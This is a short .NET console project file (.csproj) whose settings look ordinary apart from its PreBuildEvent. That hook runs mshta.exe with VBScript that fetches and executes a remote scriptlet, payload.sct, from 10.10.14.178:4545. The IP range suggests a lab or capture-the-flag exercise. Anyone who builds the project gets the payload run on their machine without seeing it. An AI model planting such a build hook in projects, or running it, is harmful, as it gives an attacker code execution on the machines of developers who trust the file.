<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <PreBuildEvent>
      <Command> mshta.exe vbscript:Close(Execute("GetObject(""script:http://10.10.14.178:4545/payload.sct"")")) </Command>
    </PreBuildEvent>
  </PropertyGroup>

</Project>

